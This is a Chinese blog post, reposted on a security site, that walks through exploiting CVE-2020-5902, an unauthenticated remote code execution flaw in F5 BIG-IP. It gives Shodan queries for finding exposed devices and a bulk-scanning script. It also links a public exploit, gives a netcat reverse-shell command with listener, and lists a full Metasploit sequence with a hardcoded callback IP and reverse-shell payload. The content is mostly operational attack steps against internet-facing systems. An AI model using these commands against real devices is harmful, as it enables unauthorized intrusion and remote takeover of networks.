漏洞复现 | CVE‐2020‐5902踩坑记

admin 2020年8月25日23:46:37评论427 views字数 1190阅读3分58秒阅读模式

本文作者:TaoingMs08067实验室 SRSP TEAM小组成员)

漏洞复现 | CVE‐2020‐5902踩坑记

   0x0:漏洞概述


F5 BIG‐IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE‐2020‐5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。


0x1:影响版本范围


F5 BIGIP < 15.1.0.4F5 BIGIP < 14.1.2.6F5 BIGIP < 13.1.3.4F5 BIGIP < 12.1.5.2F5 BIGIP < 11.6.5.2

0x2设备检索:


shodanhttp.favicon.hash:‐335242539 2、http.title:"BIGIP® ;‐ Redirect"

0x3shodan批量脚本:


https://github.com/aqhmal/CVE‐2020‐5902‐Scanner


1.下载脚本后安装库文件, pip3 install ‐r requirements.txt



漏洞复现 | CVE‐2020‐5902踩坑记


2.打开脚本文件scanner.py,加入自己shodan key


漏洞复现 | CVE‐2020‐5902踩坑记


漏洞复现 | CVE‐2020‐5902踩坑记


3.开干 python3 scan.py


漏洞复现 | CVE‐2020‐5902踩坑记


0x4漏洞复现:


https://github.com/jas502n/CVE‐2020‐5902更改CVE‐20205902.py 里的url,然后直接运行 python CVE‐20205902.py。这里我使用的是python2 运行


漏洞复现 | CVE‐2020‐5902踩坑记


漏洞复现 | CVE‐2020‐5902踩坑记


反弹shell:nc ‐e /bin/bash ip port监听:nc ‐lvvp port


漏洞复现 | CVE‐2020‐5902踩坑记


Msf坑之多:


1.开始我使用wget最后各种问题。直接浏览器下载。拖进msf


https://github.com/rapid7/metasploit‐framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb


2.解决方法:


下载后拖进去

﴾/usr/share/metasploit‐framework/modules/exploits/linux/http/﴿

漏洞复现 | CVE‐2020‐5902踩坑记


打开msf依次执行

msfconsole reload_all search f5_bigip


漏洞复现 | CVE‐2020‐5902踩坑记


use exploit/linux/http/f5_bigip_tmui_rceset rhost 1.2.3.4set lhost 129.204.113.202set lport 5567set payload cmd/unix/reverse_pythonrun


0x5:总结:


坑点:msf最好在云上,虚拟机啥的弹不了





扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

漏洞复现 | CVE‐2020‐5902踩坑记 漏洞复现 | CVE‐2020‐5902踩坑记

漏洞复现 | CVE‐2020‐5902踩坑记 漏洞复现 | CVE‐2020‐5902踩坑记 漏洞复现 | CVE‐2020‐5902踩坑记

目前30000+人已关注加入我们

漏洞复现 | CVE‐2020‐5902踩坑记


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月25日23:46:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | CVE‐2020‐5902踩坑记http://cn-sec.com/archives/100675.html

发表评论

匿名网友 填写信息